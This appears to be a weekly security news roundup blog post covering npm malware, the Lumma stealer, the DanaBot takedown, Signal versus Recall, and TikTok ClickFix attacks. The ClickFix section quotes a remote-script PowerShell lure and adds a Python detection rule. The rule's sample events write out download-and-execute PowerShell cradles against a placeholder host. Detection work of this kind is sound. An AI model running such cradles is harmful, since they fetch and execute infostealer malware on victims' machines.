Malware is a cyber threat that does not look like it's going anywhere anytime soon. It is a constant threat we have reviewed repeatedly in this series, and it is most of what this week's edition is about. In the mix, we also have a user-privacy article about what appears to be a stand-off between Open Whisper Systems, makers of the Signal app, and Microsoft.
Before we proceed, I'd like to apologize for the inconsistency in this month of May 2025. I should have done better, and I will do better. Please, accept my apologies.
With that out of the way, let's begin our review.
Destructive malware available in NPM repo went unnoticed for 2 years
Two years is a long time for malware to be available for download on a registry like NPM! How did it go unnoticed for that long? Guess how many downloads? Over 6000. We need to rethink security when developing app stores and package repositories. This is seriously getting out of hand and I might come up with a solution one day. Let's see what happens.
Now, tell me how worrying the following excerpt from the article is:
Some of the payloads were limited to detonate only on specific dates in 2023, but in some cases a phase that was scheduled to begin in July of that year was given no termination date.
Since all activation dates have passed (June 2023–August 2024), any developer following normal package usage today would immediately trigger destructive payloads including system shutdown.
Microsoft says Lumma password stealer malware found on 394,000 Windows PCs
ESET documented Lumma Stealer as a fast-growing infostealer in early 2025. Now, Microsoft has noted that the same stealer is on 394k PCs across the globe. They're now taking steps to shut it down and I pray that they are successful. I still don't get it: why would someone invest time and money to write code to cause harm?
From the article:
The Lumma password stealer can be found in dodgy games or cracked apps downloaded from the internet. Once infected, the malware steals logins, passwords, credit cards, and cryptocurrency wallets from the victim's computer, which are sold to other cybercriminals.
CrowdStrike Collaborates with U.S. Department of Justice on DanaBot Takedown
Another piece of malware. Sometimes I just feel sick writing the word malware. Anyway, it appears this one has bitten the dust thanks to law enforcement and cyber security leaders like CrowdStrike. What else can I say? Two things are worth noting: who the threat actors behind DanaBot are, and why the takedown matters.
To make it easy for you and me, CrowdStrike covered both in the article linked above, and I have highlighted them below:
SCULLY SPIDER is a Russia-based eCrime adversary known for developing and operating DanaBot as a malware-as-a-service (MaaS).
DanaBot initially targeted victims in Ukraine, Poland, Italy, Germany, Austria, and Australia prior to expanding its targeting posture to include U.S.- and Canada-based financial institutions in October 2018.
The takedown of DanaBot represents a significant blow not just to an eCrime operation but to a cyber capability that has appeared to align Russian government interests.
Signal's new Windows update prevents the system from capturing screenshots of chats
What one person considers a good feature can be a privacy nightmare for others. That's my summary of this article about Signal and Microsoft Recall. Recall works by capturing screenshots of your PC's screen every few seconds so that you can, well, retrace your steps.
Now, Signal says: Hello Recall, we are not going to allow you to capture screenshots here. Why? Because we advocate users' privacy, and what you're trying to do contradicts that! Get it?
And, of course, the following:
We hope that the AI teams building systems like Recall will think through these implications more carefully in the future. Apps like Signal shouldn't have to implement a "one weird trick" in order to maintain the privacy and integrity of their services.
TikTok videos now push infostealer malware in ClickFix attacks
If you're not a techy, don't believe anything on TikTok that tells you to install an app or run a command on your computer. You have been warned.
Here is what can happen if you don't heed that warning:
One of the videos claiming to provide instructions on how to "boost your Spotify experience instantly," has reached almost 500,000 views.
In the video, the attackers prompt viewers to run a PowerShell command that will instead download and execute a remote script from hxxps://allaivo[.]me/spotify that installs Vidar or StealC information-stealing malware.
After being deployed, Vidar can take desktop screenshots and steal credentials, credit cards, cookies, cryptocurrency wallets, text files, and Authy 2FA authenticator databases.
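The excerpt describes a classic ClickFix chain: a one-line PowerShell command that fetches a remote script and executes it in memory. As an added, defender-side example that is not from the article or from any vendor, here is a small Python rule that flags that command-line shape in process-creation events; the events, user names and the example.invalid domain are all constructed for the demonstration.

```python
import re
from dataclasses import dataclass

# Constructed sample events (not real telemetry). Each line is
# "<timestamp> <user> <command line>", roughly a Sysmon Event ID 1 export.
SAMPLE_EVENTS = [
    '2025-05-23T10:01:02Z alice "C:\\Windows\\System32\\notepad.exe" notes.txt',
    '2025-05-23T10:02:15Z alice powershell -w hidden -ep bypass -c "iex (irm https://example.invalid/spotify)"',
    '2025-05-23T10:03:40Z bob powershell -Command "Get-ChildItem C:\\Users\\bob\\Documents"',
    '2025-05-23T10:04:09Z carol powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString(\'https://example.invalid/boost\')"',
    '2025-05-23T10:05:31Z dave mshta https://example.invalid/x.hta',
]

# Individual indicators. None of them is malicious alone (irm and iwr are
# everyday cmdlets), so the decision below requires a combination.
INDICATORS = {
    "execute_in_memory": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "remote_fetch": re.compile(r"\b(irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring|downloadfile)\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I),
    "url_in_cmdline": re.compile(r"https?://[^\s\"')]+", re.I),
}

@dataclass
class Finding:
    timestamp: str
    user: str
    indicators: list
    cmdline: str

def classify(cmdline: str) -> list:
    """Return the names of every indicator present in one command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]

def is_download_cradle(hits) -> bool:
    """A download-and-execute cradle pairs an in-memory execute primitive
    with a remote fetch (or at least a raw URL) in the same command line."""
    return "execute_in_memory" in hits and ("remote_fetch" in hits or "url_in_cmdline" in hits)

def scan(events) -> list:
    """Apply the rule to PowerShell launches only; other LOLBins (mshta, etc.)
    need their own rule and are deliberately skipped here."""
    findings = []
    for line in events:
        ts, user, cmdline = line.split(" ", 2)
        if not re.search(r"\bpowershell(\.exe)?\b", cmdline, re.I):
            continue
        hits = classify(cmdline)
        if is_download_cradle(hits):
            findings.append(Finding(ts, user, hits, cmdline))
    return findings
```

Running `scan(SAMPLE_EVENTS)` flags the two cradle launches (alice and carol) and leaves bob's ordinary directory listing alone; the extra indicators such as `hidden_window` and `policy_bypass` are carried along so an analyst can prioritise the noisier hits.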
Credits
Cover photo by Debby Hudson on Unsplash.
That's it for this week, and I'll see you next time.
Top comments (2)
Dude, you don't need to, sincerely. Life happens, everyone knows that, and nobody here will (and has a right to) keep you accountable for a couple of missing articles to the extent you need to apologize. You're doing great, and thanks for the insightful weekly roundup.
Thank you for the comment. I appreciate it.